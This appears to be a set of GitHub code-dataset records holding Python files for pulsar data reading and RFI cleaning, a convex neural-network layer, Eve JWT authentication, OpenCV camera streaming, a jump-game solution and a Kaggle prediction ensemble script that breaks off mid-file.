med_tim\r\n\r\n #### Remove RFI in frequency ####\r\n # data_frq = data_rfi.copy().mean(axis= 0)\r\n # med_frq = np.median(data_frq)\r\n # rms_frq = np.median(np.abs(data_frq - med_frq))\r\n # sigma_frq = ((data_frq - med_frq)/rms_frq).reshape(-1)\r\n # data_rfi.transpose()[np.where(sigma_frq > tthresh)] = med_rfi\r\n # print(med_rfi.shape, data_rfi.transpose().shape, ignore)\r\n # 
data_rfi.transpose()[ignore] = med_rfi\r\n return data_rfi\r\n\r\ndef cleanning_gpu(din, tthresh, totalch, choff_low, choff_high, nbl, wsize, sample):\r\n #### Remove RFI in time ####\r\n nch = totalch-choff_low-choff_high\r\n data_rfi = din[:, choff_high: totalch-choff_low]\r\n # data_rfi = data_rfi - data_rfi.mean(dim = 0)\r\n # med, rms = mad_gpu(data_rfi.detach().clone(), nbl, wsize)\r\n # sigma = ((data_rfi.mean(dim = 1).view(nbl, wsize) - med\r\n # )/rms.view(nbl, 1)).view(-1)\r\n # data_rfi[torch.where(sigma > tthresh)] = data_rfi.mean(dim=0)\r\n\r\n # #### Remove RFI in frequency ####\r\n # tmp_frq, _ = torch.sort(data_rfi.mean(dim= 0), dim=0) \r\n # med_frq = tmp_frq[nch//2]\r\n # tmp_frq, _ = torch.sort(torch.abs(tmp_frq - med_frq))\r\n # rms_frq = tmp_frq[nch//2]\r\n # sigma_frq = ((data_rfi.mean(dim = 0) - med_frq)/rms_frq).view(-1)\r\n # data_rfi.transpose()[torch.where(sigma_frq > tthresh)] = data_rfi.mean(dim=1)\r\n return data_rfi\r\n\r\n# def disbar(max, dn):\r\n# jd = '\\r %2d%% [%s%s]'\r\n# a = '*'* np.ceil(dn*100/max)\r\n# b = ' '* ((max-dn)*100//max)\r\n# c = (dn/max)*100+1\r\n# print(jd % (c,a,b), end=\"\", flush=True)\r\n\r\ndef read_psrfits_head(psrfits_file, ststart):\r\n \"\"\"\r\n Modified from presto prsfit.py\r\n \"\"\"\r\n global nsampsub, nsubints, numpolns, polnorder\r\n header = {'ibeam':0, 'nbeams':1,}\r\n print(\"Reading...\", psrfits_file, time.time() - ststart)\r\n sys.stdout.flush()\r\n with open (psrfits_file,'rb') as fn:\r\n psr01 = pyfits.open(fn, mode='readonly', memmap=True)\r\n fits_header = psr01['PRIMARY'].header\r\n sub_header = psr01['SUBINT'].header\r\n header['telescope_id'] = fits_header['TELESCOP']\r\n header['machine_id'] = fits_header['BACKEND']\r\n header['source_name'] = fits_header['SRC_NAME']\r\n header['src_raj'] = float(fits_header['RA'].replace(':',''))\r\n header['src_dej'] = float(fits_header['DEC'].replace(':',''))\r\n header['tstart'] = (fits_header['STT_IMJD'] + fits_header['STT_SMJD']/86400.0 + \r\n fits_header['STT_OFFS']/86400.0)\r\n header['fch1'] = (fits_header['OBSFREQ'] + np.abs(fits_header['OBSBW'])/2.0 - \r\n np.abs(sub_header['CHAN_BW'])/2.0)\r\n header['foff'] = -1.0*np.abs(sub_header['CHAN_BW'])\r\n header['nchans'] = sub_header['NCHAN']\r\n header['nbits'] = sub_header['NBITS']\r\n header['tsamp'] = sub_header['TBIN']\r\n header['nifs'] = sub_header['NPOL']\r\n header['totalsm'] = sub_header['NSBLK']*sub_header['NAXIS2']\r\n nsampsub = sub_header['NSBLK']\r\n nsubints = sub_header['NAXIS2'] \r\n numpolns = sub_header['NPOL']\r\n polnorder = sub_header['POL_TYPE']\r\n return header\r\n\r\ndef read_psrfits(psrfits_file, ststart):\r\n \"\"\"\r\n Modified from presto prsfit.py\r\n \"\"\"\r\n header = {'ibeam':0, 'nbeams':1,}\r\n print(\"Reading...\", psrfits_file, time.time() - ststart)\r\n sys.stdout.flush()\r\n with open (psrfits_file,'rb') as fn:\r\n psr01 = pyfits.open(fn, mode='readonly', memmap=True)\r\n fits_header = psr01['PRIMARY'].header\r\n sub_header = psr01['SUBINT'].header\r\n header['telescope_id'] = fits_header['TELESCOP']\r\n header['machine_id'] = fits_header['BACKEND']\r\n header['source_name'] = fits_header['SRC_NAME']\r\n header['src_raj'] = float(fits_header['RA'].replace(':',''))\r\n header['src_dej'] = float(fits_header['DEC'].replace(':',''))\r\n header['tstart'] = (fits_header['STT_IMJD'] + fits_header['STT_SMJD']/86400.0 + \r\n fits_header['STT_OFFS']/86400.0)\r\n header['fch1'] = (fits_header['OBSFREQ'] + np.abs(fits_header['OBSBW'])/2.0 - \r\n np.abs(sub_header['CHAN_BW'])/2.0)\r\n 
header['foff'] = -1.0*np.abs(sub_header['CHAN_BW'])\r\n        header['nchans'] = sub_header['NCHAN']\r\n        header['nbits'] = sub_header['NBITS']\r\n        header['tsamp'] = sub_header['TBIN']\r\n        header['nifs'] = sub_header['NPOL']\r\n        header['totalsm'] = sub_header['NSBLK']*sub_header['NAXIS2']\r\n        nsampsub = sub_header['NSBLK']\r\n        nsubints = sub_header['NAXIS2'] \r\n        numpolns = sub_header['NPOL']\r\n        polnorder = sub_header['POL_TYPE']\r\n        data = np.zeros((header['totalsm'], header['nchans']), dtype=np.float32)\r\n        for i in range(nsubints):\r\n            psrdata = psr01['SUBINT'].data[i]['DATA']\r\n            shp = psrdata.squeeze().shape\r\n            if (len(shp)==3 and shp[1]==numpolns and polnorder == 'IQUV'):\r\n                # print(\"Polarization is IQUV, just using Stokes I\")\r\n                data[i*nsampsub: (i+1)*nsampsub]= psrdata[:,0,:].squeeze()\r\n            else:\r\n                data[i*nsampsub: (i+1)*nsampsub] = np.asarray(psrdata.squeeze())\r\n    return header, data[:, ::-1]\r\n\r\ndef read_file(filen, data_raw, numbits, headsize, countsize, smaple, average, \r\n                nchan, freqavg, tstart):\r\n    if numbits >= 8: # BITS NUMBER 8/16/32\r\n        # with open(str(filen),'rb') as fn:\r\n        fn = open(str(filen),'rb')\r\n        fn.seek(headsize)\r\n        if numbits == 32:\r\n            data_raw = np.fromfile(fn, dtype=np.float32, count=countsize)\r\n        elif numbits == 16:\r\n            data_raw = np.fromfile(fn, dtype=np.uint16, count=countsize)\r\n        elif numbits == 8:\r\n            data_raw = np.fromfile(fn, dtype=np.uint8, count=countsize)\r\n        fn.close()\r\n\r\n        if data_raw.size != countsize:\r\n            print(\"FILE SIZE ERROR %d / %d %s Time:%.2f sec\"%(data_raw.size, \r\n                countsize, filen, (time.time() - tstart)))\r\n            sys.stdout.flush()\r\n            exit()\r\n        data_raw = data_raw.reshape(smaple, average, nchan, freqavg).mean(axis=(1,3))\r\n    else: # BITS NUMBER 1/2/4\r\n        numbtch = 8//numbits\r\n        # with open(str(filen),'rb') as fn:\r\n        fn = open(str(filen),'rb')\r\n        fn.seek(headsize)\r\n        data_raw = np.fromfile(fn, dtype=np.uint8, count=countsize//numbtch)\r\n        fn.close()\r\n\r\n        if data_raw.size != countsize//numbtch :\r\n            print(\"FILE SIZE ERROR %s Time:%.2f sec\"%(filen, \r\n                (time.time() - tstart)))\r\n            sys.stdout.flush()\r\n            exit()\r\n        data_raw = data_raw.reshape(smaple*average, (nchan*freqavg)//numbtch, 1).repeat(numbtch, axis=2) \r\n        # unpack the packed samples in place; the shift/mask result must be assigned back\r\n        if numbtch == 2 :\r\n            for i in range(numbtch):\r\n                data_raw[:, :, i] = data_raw[:, :, i] >> i*numbits & 0x0f\r\n        elif numbtch == 4 :\r\n            for i in range(numbtch):\r\n                data_raw[:, :, i] = data_raw[:, :, i] >> i*numbits & 0x03\r\n        elif numbtch == 8 :\r\n            for i in range(numbtch):\r\n                data_raw[:, :, i] = data_raw[:, :, i] >> i*numbits & 0x01 \r\n        data_raw = data_raw.reshape(smaple, average, nchan, freqavg).mean(axis=(1,3))\r\n    return data_raw ","repo_name":"Xu-Zhijun/STEP","sub_path":"step_lib_comm.py","file_name":"step_lib_comm.py","file_ext":"py","file_size_in_byte":14769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"2129755743","text":"import numpy as np\nfrom scipy.signal import argrelextrema\n\n\ndef compress_eq_neighbor(idxes):\n    new_idxes = np.append(idxes, 0)\n    return np.asarray([new_idxes[i] for i in range(new_idxes.size - 1)\n                       if not new_idxes[i] + 1 == new_idxes[i + 1]])\n\n\ndef extr_points(points, indexes=None, extr_type=np.greater_equal):\n    if indexes is None:\n        indexes = np.asarray(range(points.size))\n\n    extr_idx = argrelextrema(points, extr_type)[0]\n    extr_idx = compress_eq_neighbor(extr_idx)\n    extr_points = np.take(points, extr_idx)\n\n    extr_idx = np.take(indexes, extr_idx)\n\n    return extr_points, 
extr_idx","repo_name":"ErkinVasiliy/binance_bot","sub_path":"bot/math.py","file_name":"math.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71339025208","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\nfrom hessQuik.layers import hessQuikLayer\nimport hessQuik.activations as act\nfrom typing import Union, Tuple\n\n\nclass ICNNLayer(hessQuikLayer):\n r\"\"\"\n Evaluate and compute derivatives of a single layer.\n\n Examples::\n\n >>> import torch, hessQuik.layers as lay\n >>> f = lay.ICNNLayer(4, None, 7)\n >>> x = torch.randn(10, 4)\n >>> fx, dfdx, d2fd2x = f(x, do_gradient=True, do_Hessian=True)\n >>> print(fx.shape, dfdx.shape, d2fd2x.shape)\n torch.Size([10, 11]) torch.Size([10, 4, 11]) torch.Size([10, 4, 4, 11])\n\n \"\"\"\n\n def __init__(self, input_dim: int, in_features: Union[int, None], out_features: int,\n act: act.hessQuikActivationFunction = act.softplusActivation(),\n bias: bool = True,\n device=None, dtype=None) -> None:\n r\"\"\"\n\n :param input_dim: dimension of network inputs\n :type input_dim: int\n :param in_features: number of input features. For first ICNN layer, set ``in_features = None``\n :type in_features: int or``None``\n :param out_features: number of output features\n :type out_features: int\n :param act: activation function\n :type act: hessQuikActivationFunction\n :var K: weight matrix for the network inputs of size :math:`(d, n_{out})`\n :var b: bias vector of size :math:`(n_{out},)`\n :var L: weight matrix for the input features of size :math:`(n_{in}, n_{out})`\n :var nonneg: pointwise function to force :math:`l` to have nonnegative weights. Default: ``torch.nn.functional.softplus``\n \"\"\"\n factory_kwargs = {'device': device, 'dtype': dtype}\n super(ICNNLayer, self).__init__()\n\n self.input_dim = input_dim\n self.in_features = in_features\n self.out_features = out_features\n self.act = act\n\n # extract nonnegative weights\n self.nonneg = F.softplus\n\n self.K = nn.Parameter(torch.empty(input_dim, out_features, **factory_kwargs))\n\n if in_features is not None:\n self.L = nn.Parameter(torch.empty(in_features, out_features, **factory_kwargs))\n else:\n self.register_parameter('L', None)\n\n if bias:\n self.b = nn.Parameter(torch.empty(out_features, **factory_kwargs))\n else:\n self.register_parameter('b', None)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n nn.init.kaiming_uniform_(self.K, a=math.sqrt(self.input_dim))\n\n if self.L is not None:\n nn.init.kaiming_uniform_(self.L, a=math.sqrt(self.in_features))\n fan_in, _ = nn.init._calculate_fan_in_and_fan_out(self.L)\n else:\n fan_in, _ = nn.init._calculate_fan_in_and_fan_out(self.K)\n\n bound = 1 / math.sqrt(fan_in) if fan_in > 0 else 0\n\n if self.b is not None:\n nn.init.uniform_(self.b, -bound, bound)\n\n def dim_input(self) -> int:\n r\"\"\"\n number of input features + dimension of network inputs\n \"\"\"\n n = self.input_dim\n if self.in_features is not None:\n n += self.in_features\n return n\n\n def dim_output(self) -> int:\n r\"\"\"\n number of output features + dimension of network inputs\n \"\"\"\n return self.out_features + self.input_dim\n\n def forward(self, ux, do_gradient=False, do_Hessian=False, do_Laplacian=False, forward_mode=True,\n dudx=None, d2ud2x=None, v=None):\n r\"\"\"\n Forward propagation through ICNN layer of the form\n\n .. 
math::\n\n f(x) =\n \\left[\\begin{array}{c} \\sigma\\left(\\left[\\begin{array}{c}u(x) & x\\end{array}\\right]\n \\left[\\begin{array}{c}L^+ \\\\ K\\end{array}\\right] + b\\right) & x \\end{array}\\right]\n\n Here, :math:`u(x)` is the input into the layer of size :math:`(n_s, n_{in})` which is\n a function of the input of the network, :math:`x` of size :math:`(n_s, d)`.\n The output features, :math:`f(x)`, are of size :math:`(n_s, n_{out} + d)`.\n The notation :math:`(\\cdot)^+` is a function that makes the weights of a matrix nonnegative.\n\n As an example, for one sample, :math:`n_s = 1`, the gradient with respect to\n :math:`\\begin{bmatrix} u & x \\end{bmatrix}` is of the form\n\n .. math::\n\n \\nabla_x f = \\text{diag}\\left(\\sigma'\\left(\\left[\\begin{array}{c}u(x) & x\\end{array}\\right]\n \\left[\\begin{array}{c}L^+ \\\\ K\\end{array}\\right] + b\\right)\\right)\n \\left[\\begin{array}{c}(L^+)^\\top & K^\\top\\end{array}\\right]\n \\left[\\begin{array}{c}\\nabla_x u \\\\ I\\end{array}\\right]\n\n where :math:`\\text{diag}` transforms a vector into the entries of a diagonal matrix and :math:`I` is\n the :math:`d \\times d` identity matrix.\n\n \"\"\"\n\n (dfdx, d2fd2x) = (None, None)\n\n M = self.K\n if self.L is not None:\n M = torch.cat((self.nonneg(self.L), M), dim=0)\n\n # affine transformation\n z = ux @ M\n\n if self.b is not None:\n z += self.b\n\n # forward pass\n f, dsig, d2sig = self.act.forward(z, do_gradient=do_gradient, do_Hessian=do_Hessian,\n forward_mode=True if forward_mode is True else None)\n f = torch.cat((f, ux[:, -self.input_dim:]), dim=1)\n\n if (do_gradient or do_Hessian) and forward_mode is True:\n dfdx = dsig.unsqueeze(1) * M\n\n # -------------------------------------------------------------------------------------------------------- #\n if do_Hessian:\n d2fd2x = (d2sig.unsqueeze(1) * M).unsqueeze(2) * M.unsqueeze(0).unsqueeze(0)\n\n # Gauss-Newton approximation\n if dudx is not None:\n d2fd2x = dudx.unsqueeze(1) @ (d2fd2x.permute(0, 3, 1, 2) @ dudx.unsqueeze(1).permute(0, 1, 3, 2))\n d2fd2x = d2fd2x.permute(0, 2, 3, 1)\n\n if d2ud2x is not None:\n # extra term to compute full Hessian\n d2fd2x += d2ud2x @ dfdx.unsqueeze(1)\n\n # concatenate zeros\n Z = torch.zeros(d2fd2x.shape[0], d2fd2x.shape[1], d2fd2x.shape[2], self.input_dim,\n dtype=d2fd2x.dtype, device=d2fd2x.device)\n d2fd2x = torch.cat((d2fd2x, Z), dim=-1)\n # -------------------------------------------------------------------------------------------------------- #\n\n # finish computing gradient\n if dudx is not None:\n dfdx = dudx @ dfdx\n\n I = torch.ones(dfdx.shape[0], 1, 1, dtype=dfdx.dtype, device=dfdx.device) \\\n * torch.eye(self.input_dim, dtype=dfdx.dtype, device=dfdx.device).unsqueeze(0)\n dfdx = torch.cat((dfdx, I), dim=-1)\n\n if (do_gradient or do_Hessian) and forward_mode is False:\n dfdx, d2fd2x = self.backward(do_Hessian=do_Hessian)\n\n return f, dfdx, d2fd2x\n\n def backward(self, do_Hessian=False, dgdf=None, d2gd2f=None, v=None):\n r\"\"\"\n Backward propagation through ICNN layer of the form\n\n .. math::\n\n f(u) =\n \\left[\\begin{array}{c} \\sigma\\left(\\left[\\begin{array}{c}u & x\\end{array}\\right]\n \\left[\\begin{array}{c}L^+ \\\\ K\\end{array}\\right] + b\\right) & x \\end{array}\\right]\n\n Here, the network is :math:`g` is a function of :math:`f(u)`.\n\n As an example, for one sample, :math:`n_s = 1`, the gradient of the network with respect to :math:`u` is of the form\n\n .. 
math::\n\n \\nabla_{[u,x]} g = \\left(\\sigma'\\left(\\left[\\begin{array}{c}u & x\\end{array}\\right]\n \\left[\\begin{array}{c}L^+ \\\\ K\\end{array}\\right] + b\\right) \\odot \\nabla_{[f, x]} g\\right)\n \\left[\\begin{array}{c}(L^+)^\\top & K^\\top\\end{array}\\right]\n\n where :math:`\\odot` denotes the pointwise product.\n\n \"\"\"\n M = self.K\n if self.L is not None:\n M = torch.cat((self.nonneg(self.L), M), dim=0)\n\n # obtain stored information from backward pass\n d2gd2ux = None\n dsig, d2sig = self.act.backward(do_Hessian=do_Hessian)\n\n # compute gradient\n dgdux = dsig.unsqueeze(1) * M\n\n # augment gradient\n M2 = torch.ones(dgdux.shape[0], 1, 1, dtype=dgdux.dtype, device=dgdux.device) \\\n * torch.eye(self.input_dim, dtype=dgdux.dtype, device=dgdux.device).unsqueeze(0)\n\n if self.in_features is not None:\n Z = torch.zeros(dgdux.shape[0], self.input_dim, self.in_features)\n M2 = torch.cat((Z, M2), dim=-1).permute(0, 2, 1)\n\n dgdux = torch.cat((dgdux, M2), dim=-1)\n\n if do_Hessian:\n # TODO: change order of operations, multiply K's first; check if logic with better naming\n d2gd2ux = (d2sig.unsqueeze(1) * M.unsqueeze(0)).unsqueeze(2) * M.unsqueeze(0).unsqueeze(0)\n\n # concatenate zeros\n Z = torch.zeros(d2gd2ux.shape[0], d2gd2ux.shape[1], d2gd2ux.shape[2], self.input_dim,\n dtype=d2gd2ux.dtype, device=d2gd2ux.device)\n d2gd2ux = torch.cat((d2gd2ux, Z), dim=-1)\n\n if d2gd2f is not None:\n # Gauss-Newton approximation\n h1 = (dgdux.unsqueeze(1) @ d2gd2f.permute(0, 3, 1, 2) @ dgdux.permute(0, 2, 1).unsqueeze(1))\n h1 = h1.permute(0, 2, 3, 1)\n\n # extra term to compute full Hessian\n N, _, _, m = d2gd2ux.shape\n h2 = d2gd2ux.view(N, -1, m) @ dgdf.view(N, m, -1)\n h2 = h2.view(h1.shape)\n\n # combine\n d2gd2ux = h1 + h2\n\n # finish computing gradient\n if dgdf is not None:\n dgdux = dgdux @ dgdf\n\n return dgdux, d2gd2ux\n\n\nif __name__ == '__main__':\n from hessQuik.utils import input_derivative_check\n torch.set_default_dtype(torch.float64)\n\n nex = 11 # no. of examples\n d = 3 # no. of input features\n m = 5 # no. of output features\n x = torch.randn(nex, d)\n f = ICNNLayer(d, None, m, act=act.softplusActivation())\n\n print('======= FORWARD =======')\n input_derivative_check(f, x, do_Hessian=True, verbose=True, forward_mode=True)\n\n print('======= BACKWARD =======')\n input_derivative_check(f, x, do_Hessian=True, verbose=True, forward_mode=False)\n","repo_name":"elizabethnewman/hessQuik","sub_path":"hessQuik/layers/icnn_layer.py","file_name":"icnn_layer.py","file_ext":"py","file_size_in_byte":10415,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"77"} +{"seq_id":"18998724149","text":"import os\nimport jwt\n\nfrom eve import Eve\nfrom eve.auth import TokenAuth\nfrom flask import abort, current_app as api\n\nclass MyAuth(TokenAuth):\n def check_auth(self, token, allowed_roles, resource, method):\n \"\"\" Checks for the validity of the provided JWT and grants access.\n\n First we check to see if any user with a given token exists. If it does,\n we decode the token and check if the payload is verifiable. If so, we're\n good to go. 
If not, we abort with 401 unauthorized.\n        \"\"\"\n\n        accounts = api.data.driver.db['accounts']\n        lookup = { 'access_token': token }\n        if allowed_roles:\n            # only retrieve a user if his roles match ``allowed_roles``\n            lookup['roles'] = {'$in': allowed_roles}\n        account = accounts.find_one(lookup)\n\n        if not account:\n            abort(401, description=\"The provided access token is invalid or the role is not allowed\")\n\n        try:\n            access_payload = jwt.decode(token, os.environ.get('APP_SECRET', 'sekkret'), algorithms=['HS256'])\n\n            return account and account['username'] == access_payload['username']\n        except jwt.ExpiredSignatureError:\n            abort(401, description=\"Your access token is expired.\")\n","repo_name":"caiohsramos/usp-smped-api","sub_path":"app/api/auth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38526526403","text":"#====================================#\n# Date: 2023.8.19\n#====================================#\nimport os\nimport cv2\nfrom base_camera import BaseCamera\nimport time\n\n#====================================#\n# Camera\n#====================================#\nclass Camera(BaseCamera):\n    video_source = 0 #select camera, 0 for default camera\n\n    def __init__(self):\n        if os.environ.get('OPENCV_CAMERA_SOURCE'):\n            Camera.set_video_source(int(os.environ['OPENCV_CAMERA_SOURCE']))\n        super(Camera, self).__init__()\n\n    @staticmethod\n    def set_video_source(source):\n        Camera.video_source = source\n\n    @staticmethod\n    def frames():\n        camera = cv2.VideoCapture(Camera.video_source)\n        if not camera.isOpened():\n            raise RuntimeError('Could not start camera.')\n\n        while True:\n            # read current frame\n            _, img = camera.read()\n\n            # get local time\n            timeArray = time.localtime()\n            otherStyleTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", timeArray)\n            cv2.putText(img, str(otherStyleTime), (10, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 2)\n\n            # encode as a jpeg image and return it\n            yield cv2.imencode('.jpg', img)[1].tobytes()","repo_name":"GengJie-Jay/Wildlife-monitor-ENG5105","sub_path":"camera_opencv.py","file_name":"camera_opencv.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32919576443","text":"\"\"\"\nLintCode problem 116: https://www.lintcode.com/problem/116/\n\"\"\"\n\nfrom typing import (\n    List,\n)\n\nclass Solution:\n    \"\"\"\n    @param a: A list of integers\n    @return: A boolean\n    \"\"\"\n    \"\"\"\n    Logic: keep track of the previous number, i.e. where you are coming from \n\n    Edge case:\n    1. if a list is empty, return False \n    \n    Initialize a list, tracker, with length of a, populated with False. \n    Since it's made clear that the first element of a list >= 1, set \n    tracker[0] to True.\n\n    For range of (1, length of a), with i:\n        For range of i, with j:\n            if tracker[j] and j + a[j] >= i:\n                tracker[i] = True \n                break \n    \n    return tracker[-1]\n    \"\"\"\n    def can_jump(self, a: List[int]) -> bool:\n        if not a:\n            return False \n        \n        tracker = [False] * len(a) \n        tracker[0] = True \n\n        for i in range(1, len(a)):\n            for j in range(i):\n                # 1. make sure where we are coming from is a valid point\n                # 2. 
if the jump length of the j point could reach current i\n if tracker[j] and j + a[j] >= i:\n tracker[i] = True\n break \n \n return tracker[-1]\n","repo_name":"sherry-debug715/Algorithms-notes","sub_path":"Dynamic Programming/coordinates/JumpGame.py","file_name":"JumpGame.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14069740378","text":"\nimport gc\nimport numpy as np\nimport pandas as pd\nimport sys\n\nfrom scipy.optimize import minimize\nfrom tqdm import tqdm\n\nfrom utils import amex_metric_mod, line_notify\n\n#==============================================================================\n# Ensemble by seed\n#==============================================================================\n\nsub_path = '../output/submission_ensemble_seed_avg.csv'\noof_path = '../output/oof_ensemble_seed_avg.csv'\n\nsub_path_lgbm_seed_avg = '../output/submission_lgbm_agg_seed_avg.csv'\nsub_path_cb_seed_avg = '../output/submission_cb_agg_seed_avg.csv'\nsub_path_xgb_seed_avg = '../output/submission_xgb_agg_seed_avg.csv'\n\noof_path_lgbm_seed_avg = '../output/oof_lgbm_agg_seed_avg.csv'\noof_path_cb_seed_avg = '../output/oof_cb_agg_seed_avg.csv'\noof_path_xgb_seed_avg = '../output/oof_xgb_agg_seed_avg.csv'\n\ndef main():\n # load csv\n sub = pd.read_csv('../input/sample_submission.csv')\n oof = pd.read_csv('../input/train_labels.csv')\n\n sub_lgbm = pd.DataFrame()\n sub_cb = pd.DataFrame()\n sub_xgb = pd.DataFrame()\n\n oof_lgbm = pd.DataFrame()\n oof_cb = pd.DataFrame()\n oof_xgb = pd.DataFrame()\n\n sub_lgbm['customer_ID'] = sub['customer_ID']\n sub_cb['customer_ID'] = sub['customer_ID']\n sub_xgb['customer_ID'] = sub['customer_ID']\n\n oof_lgbm['customer_ID'] = oof['customer_ID']\n oof_cb['customer_ID'] = oof['customer_ID']\n oof_xgb['customer_ID'] = oof['customer_ID']\n\n oof_lgbm['target'] = oof['target']\n oof_cb['target'] = oof['target']\n oof_xgb['target'] = oof['target']\n\n sub_lgbm['prediction'] = np.zeros(sub.shape[0])\n sub_cb['prediction'] = np.zeros(sub.shape[0])\n sub_xgb['prediction'] = np.zeros(sub.shape[0])\n\n oof_lgbm['prediction'] = np.zeros(oof.shape[0])\n oof_cb['prediction'] = np.zeros(oof.shape[0])\n oof_xgb['prediction'] = np.zeros(oof.shape[0])\n\n print('seed averaging...')\n for seed in tqdm([42, 52, 62]):\n # load csv\n sub_path_lgbm = f'../output/submission_lgbm_agg_{seed}.csv'\n sub_path_cb = f'../output/submission_cb_agg_{seed}.csv'\n sub_path_xgb = f'../output/submission_xgb_agg_{seed}.csv'\n\n oof_path_lgbm = f'../output/oof_lgbm_agg_{seed}.csv'\n oof_path_cb = f'../output/oof_cb_agg_{seed}.csv'\n oof_path_xgb = f'../output/oof_xgb_agg_{seed}.csv'\n\n tmp_sub_lgbm = pd.read_csv(sub_path_lgbm)\n tmp_sub_cb = pd.read_csv(sub_path_cb)\n tmp_sub_xgb = pd.read_csv(sub_path_xgb)\n\n tmp_oof_lgbm = pd.read_csv(oof_path_lgbm)\n tmp_oof_cb = pd.read_csv(oof_path_cb)\n tmp_oof_xgb = pd.read_csv(oof_path_xgb)\n\n # to rank\n tmp_sub_lgbm['prediction'] = tmp_sub_lgbm['prediction'].rank() / len(tmp_sub_lgbm)\n tmp_sub_cb['prediction'] = tmp_sub_cb['prediction'].rank() / len(tmp_sub_cb)\n tmp_sub_xgb['prediction'] = tmp_sub_xgb['prediction'].rank() / len(tmp_sub_xgb)\n\n tmp_oof_lgbm['prediction'] = tmp_oof_lgbm['prediction'].rank() / len(tmp_oof_lgbm)\n tmp_oof_cb['prediction'] = tmp_oof_cb['prediction'].rank() / len(tmp_oof_cb)\n tmp_oof_xgb['prediction'] = tmp_oof_xgb['prediction'].rank() / len(tmp_oof_xgb)\n \n # average predictions\n sub_lgbm['prediction'] += 
tmp_sub_lgbm['prediction'] / 3\n sub_cb['prediction'] += tmp_sub_cb['prediction'] / 3\n sub_xgb['prediction'] += tmp_sub_xgb['prediction'] / 3\n\n oof_lgbm['prediction'] += tmp_oof_lgbm['prediction'] / 3\n oof_cb['prediction'] += tmp_oof_cb['prediction'] / 3\n oof_xgb['prediction'] += tmp_oof_xgb['prediction'] / 3\n\n # to rank\n sub_lgbm['prediction'] = sub_lgbm['prediction'].rank() / len(sub_lgbm)\n sub_cb['prediction'] = sub_cb['prediction'].rank() / len(sub_cb)\n sub_xgb['prediction'] = sub_xgb['prediction'].rank() / len(sub_xgb)\n\n oof_lgbm['prediction'] = oof_lgbm['prediction'].rank() / len(oof_lgbm)\n oof_cb['prediction'] = oof_cb['prediction'].rank() / len(oof_cb)\n oof_xgb['prediction'] = oof_xgb['prediction'].rank() / len(oof_xgb)\n\n # calc full score\n full_score_lgbm = round(amex_metric_mod(oof_lgbm['target'], oof_lgbm['prediction']),6)\n full_score_cb = round(amex_metric_mod(oof_cb['target'], oof_cb['prediction']),6)\n full_score_xgb = round(amex_metric_mod(oof_xgb['target'], oof_xgb['prediction']),6)\n\n # LINE notify\n line_notify(f'Full kaggle metric lgbm: {full_score_lgbm}')\n line_notify(f'Full kaggle metric cb: {full_score_cb}')\n line_notify(f'Full kaggle metric xgb: {full_score_xgb}')\n\n # save csv\n sub_lgbm[['customer_ID','prediction']].to_csv(sub_path_lgbm_seed_avg, index=False)\n sub_cb[['customer_ID','prediction']].to_csv(sub_path_cb_seed_avg, index=False)\n sub_xgb[['customer_ID','prediction']].to_csv(sub_path_xgb_seed_avg, index=False)\n\n oof_lgbm[['customer_ID','prediction']].to_csv(oof_path_lgbm_seed_avg, index=False)\n oof_cb[['customer_ID','prediction']].to_csv(oof_path_cb_seed_avg, index=False)\n oof_xgb[['customer_ID','prediction']].to_csv(oof_path_xgb_seed_avg, index=False)\n\n # rename columns\n oof_lgbm.rename(columns={'prediction': 'prediction_lgbm'},inplace=True)\n oof_cb.rename(columns={'prediction': 'prediction_cb'},inplace=True)\n oof_xgb.rename(columns={'prediction': 'prediction_xgb'},inplace=True)\n\n # merge oof\n oof = oof.merge(oof_lgbm,on=['customer_ID','target'],how='left')\n oof = oof.merge(oof_cb,on=['customer_ID','target'],how='left')\n oof = oof.merge(oof_xgb,on=['customer_ID','target'],how='left')\n\n del oof_lgbm, oof_cb, oof_xgb\n gc.collect()\n\n # cols to use\n cols_pred = ['prediction_lgbm','prediction_cb','prediction_xgb']\n\n # objective function for scipy optimize\n def obj_func(weights):\n ''' scipy minimize will pass the weights as a numpy array '''\n final_prediction = 0\n for weight, c in zip(weights, cols_pred):\n final_prediction += weight*oof[c]\n\n return -amex_metric_mod(oof['target'], final_prediction) \n\n # Optimization runs 100 times.\n lls = []\n wghts = []\n print('Optimization runs 100 times...')\n for i in tqdm(range(100)):\n starting_values = np.random.uniform(size=len(cols_pred))\n # cons are given as constraints.\n cons = ({'type':'eq','fun':lambda w: 1-sum(w)})\n bounds = [(0,1)]*len(cols_pred)\n \n res = minimize(obj_func, \n starting_values, \n constraints=cons,\n bounds = bounds, \n method='SLSQP')\n\n lls.append(res['fun'])\n wghts.append(res['x'])\n\n # get weights\n bestSC = np.min(lls)\n w = wghts[np.argmin(lls)] # [0.62779581 0.00637736 0.36582683]\n print('\\n Ensemble Score: {best_score:.7f}'.format(best_score=bestSC))\n print('weights: {}'.format(w))\n\n # calc prediction\n preds = [sub_lgbm, sub_cb, sub_xgb]\n\n oof['prediction'] = 0.0\n for i, (p, c) in enumerate(zip(preds,cols_pred)):\n sub['prediction'] += w[i]*p['prediction']\n oof['prediction'] += w[i]*oof[c]\n\n # save csv\n 
